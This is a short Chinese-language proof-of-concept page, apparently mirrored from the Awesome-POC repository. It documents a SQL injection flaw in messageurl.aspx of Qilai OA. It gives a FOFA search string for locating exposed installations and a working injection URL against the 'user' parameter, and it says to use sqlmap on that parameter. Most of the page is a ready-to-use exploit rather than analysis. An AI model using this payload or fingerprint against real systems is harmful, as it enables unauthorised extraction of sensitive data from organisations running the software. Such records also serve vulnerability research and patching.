mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 20:06:03 +00:00
35 lines
574 B
Markdown
35 lines
574 B
Markdown
# 启莱OA messageurl.aspx SQL注入漏洞
|
||
|
||
## 漏洞描述
|
||
|
||
启莱OA messageurl.aspx文件存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
启莱OA
|
||
```
|
||
|
||
## FOFA
|
||
|
||
```
|
||
app="启莱OA"
|
||
```
|
||
|
||
## 漏洞复现
|
||
|
||
登录页面如下
|
||
|
||

|
||
|
||
存在SQL注入的文件为 messageurl.aspx
|
||
|
||
```plain
|
||
http://xxx.xxx.xxx.xxx/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1
|
||
```
|
||
|
||

|
||
|
||
使用SQLmap对参数 user 进行注入
|
||
|
||
 |